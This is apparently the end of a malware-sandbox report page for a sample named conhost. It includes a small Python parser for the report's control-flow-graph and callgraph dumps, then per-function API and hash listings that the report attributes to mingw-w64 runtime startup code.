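            g.nodes[block.node_id] = block
            last = None
            i += 2
        elif tok == "call":
            block.internal_calls.append([int(toks[i + 1], 16), 1])
            last = block.internal_calls
            i += 2
        elif tok == "*":
            last[-1][1] = int(toks[i + 1])    # repeat count for the previous callee
            i += 2
        else:
            block.api_calls.append([tok, 1])  # anything else is an imported API name
            last = block.api_calls
            i += 1
    return g


def parse_callgraph(text: str) -> Graph:
    """'<id> Function_<addr>' declares a function node; '<a>-><b>' is a call."""
    toks = text.split()
    if toks and toks[0] == "callgraph":
        toks = toks[1:]
    g = Graph()
    for a, b in zip(toks, toks[1:] + [""]):
        m = EDGE_RE.match(a)
        if m:
            g.edges.append((int(m[1]), int(m[2])))
        elif NODE_ID_RE.match(a):
            f = FUNC_RE.match(b)
            if not f:
                raise ValueError(f"expected Function_<addr> after id {a}, got {b!r}")
            g.nodes[int(a)] = int(f[1], 16)
    return g


def api_totals(cfg: Graph) -> dict:
    """Total import calls over all blocks, honouring '* n' multiplicities."""
    totals = {}
    for blk in cfg.nodes.values():
        for name, n in blk.api_calls:
            totals[name] = totals.get(name, 0) + n
    return totals


def reachable(cg: Graph, root_addr: int) -> set:
    """Function addresses transitively called from root_addr (BFS over call edges)."""
    by_addr = {addr: nid for nid, addr in cg.nodes.items()}
    succ = {}
    for a, b in cg.edges:
        succ.setdefault(a, []).append(b)
    seen, todo = set(), deque([by_addr[root_addr]])
    while todo:
        for nxt in succ.get(todo.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    return {cg.nodes[n] for n in seen}


# Constructed samples: excerpts of the dumps on this report page.
SAMPLE_CFG = ("control_flow_graph 522 140001800-140001810 523 140001812-140001822 "
              "522->523 524 140001824 522->524 525 14000182b-140001867 "
              "call 140002290 fprintf 523->525 524->525")
SAMPLE_CFG_MULTI = ("control_flow_graph 358 140002aa8-140002abf wcslen "
                    "359 140002ac5-140002ad8 358->359 362 140002af5-140002dfb wcslen "
                    "call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 "
                    "call 14000145e * 3 359->362")
SAMPLE_CALLGRAPH = ("callgraph 2 Function_00000001400014E5 72 Function_0000000140001394 "
                    "2->72 17 Function_0000000140005D10 37 Function_0000000140005A50 "
                    "17->37 47 Function_0000000140005A60 47->37 72->17 72->47")

if __name__ == "__main__":
    print(api_totals(parse_cfg(SAMPLE_CFG)), api_totals(parse_cfg(SAMPLE_CFG_MULTI)))
    print(sorted(hex(a) for a in reachable(parse_callgraph(SAMPLE_CALLGRAPH), 0x1400014E5)))
```

Paste a whole control_flow_graph or callgraph line from the report into the respective parser; the leading keyword is skipped, and a line that does not follow the inferred grammar raises ValueError rather than silently producing a wrong graph.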

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                        • Instruction ID: 070ab519a2817fabac9d3928640a8dfc31f1868cd1d81c957eb574597805d415
                                                        • Opcode Fuzzy Hash: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                        • Instruction Fuzzy Hash: E05113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 140001ba0: 23 basic blocks; calls Function_00000001400023b0, Function_00000001400024d0 and Function_0000000140001d40; imports VirtualQuery, VirtualProtect, memcpy and GetLastError]
                                                        The diagnostic strings listed under Similarity for this function ("VirtualProtect failed with code 0x%x", "VirtualQuery failed for %d bytes at address %p", "Address %p has no image-section") are those of the mingw-w64 CRT's pseudo-relocation writer in pseudo-reloc.c, so the VirtualQuery/VirtualProtect/memcpy sequence here is the runtime patching its own image at startup, not sample-specific logic.
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                        • Instruction ID: 568161692b5c4f8a705951d6b28697fc04e6310cca5c6e1950853b3621b7b2e0
                                                        • Opcode Fuzzy Hash: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                        • Instruction Fuzzy Hash: 334143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 140002104: 14 basic blocks; no internal calls; imports EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue and GetLastError]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 926137887-0
                                                        • Opcode ID: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                        • Instruction ID: f187cb6aa2ea60f0469956b9f5200469d8ecfadf0b7e99ee31c93393cd0a6912
                                                        • Opcode Fuzzy Hash: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                        • Instruction Fuzzy Hash: 1521E0B1715A1292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 140001880: 32 basic blocks; calls Function_0000000140002420, Function_0000000140002660, Function_0000000140001d40 and Function_0000000140001ba0; imports VirtualProtect]
                                                        The "Unknown pseudo relocation bit size %d." and "Unknown pseudo relocation protocol version %d." strings belong to the mingw-w64 CRT's pseudo-relocation loop (pseudo-reloc.c), which applies the image's runtime pseudo-relocations at startup; together with the writer at 140001ba0 it shows that this image was built with a mingw-w64 toolchain.
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                        • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 140001800: 4 basic blocks; calls Function_0000000140002290; imports fprintf]
                                                        The "_matherr(): %s in %s(%g, %g) (retval=%g)" format is the mingw-w64 CRT's default _matherr handler, another piece of runtime code rather than sample logic.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                        • Instruction ID: 91e3a911f83b651f4698e80430053fdc384feaeeeedb9bbeb5e2969e9f62671f
                                                        • Opcode Fuzzy Hash: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                        • Instruction Fuzzy Hash: BDF0C271A04A4482E212EB2AB9413EAA360E74D3C1F409211FF4D532A1DF3CD1828300

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 14000219e: 9 basic blocks; no internal calls; imports EnterCriticalSection, LeaveCriticalSection, TlsGetValue and GetLastError]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                        • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200